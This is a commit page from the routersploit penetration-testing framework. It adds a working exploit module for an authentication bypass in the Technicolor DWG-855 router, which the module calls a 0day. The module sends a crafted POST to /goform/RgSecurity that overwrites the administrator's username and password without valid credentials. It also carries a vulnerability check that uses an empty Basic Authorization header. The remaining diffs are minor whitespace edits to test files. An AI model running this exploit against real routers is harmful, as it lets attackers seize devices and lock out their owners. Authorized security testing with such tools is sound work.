Skip to content

R
routersploit
Commit 3660f72d by fwkz
Options

Merge branch '0BuRner-patch-1'

parents 2fe031c1 3e718929
Showing with 79 additions and 0 deletions
routersploit/modules/exploits/technicolor/dwg855_authbypass.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
http_request,
mute,
validators
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
"""
__info__ = {
'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
'authors': [
'JPaulMora <https://JPaulMora.GitHub.io>',
# vulnerability discovery,routersploit module
],
'references': [
'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
],
'devices': [
'Technicolor DWG-855',
]
}
target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
npass = exploits.Option('rpass', 'New password (overwrites existing password)')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self):
print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
print_error("Target didn't answer request.")
elif self.vulnresp in response.text.encode('utf-8'):
print_success("Credentials changed!")
elif response.status_code == 401:
print_error("Target answered, denied access.")
else:
print_error("Unknown error, submit an issue.")
@mute
def check(self):
url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Authorization': 'Og==', # this is base64(":")
'Cache-Control': 'no-cache'}
response = http_request(method="GET", url=url, headers=headers)
if response is not None and self.vulnresp in response.text.encode('utf-8'):
return True
else:
return False
routersploit/test/test_completer.py
......@@ -255,5 +255,6 @@ class RoutersploitCompleterTest(RoutersploitTestCase):
'show options'
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_interpreter.py
......@@ -621,5 +621,6 @@ class RoutersploitInterpreterTest(RoutersploitTestCase):
]
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_utils.py
......@@ -52,5 +52,6 @@ class UtilsTest(RoutersploitTestCase):
]
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_validators.py
......@@ -136,5 +136,6 @@ class ValidatorsTest(RoutersploitTestCase):
value = "t"
self.assertEqual(validators.boolify(value), True)
if __name__ == '__main__':
unittest.main()
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment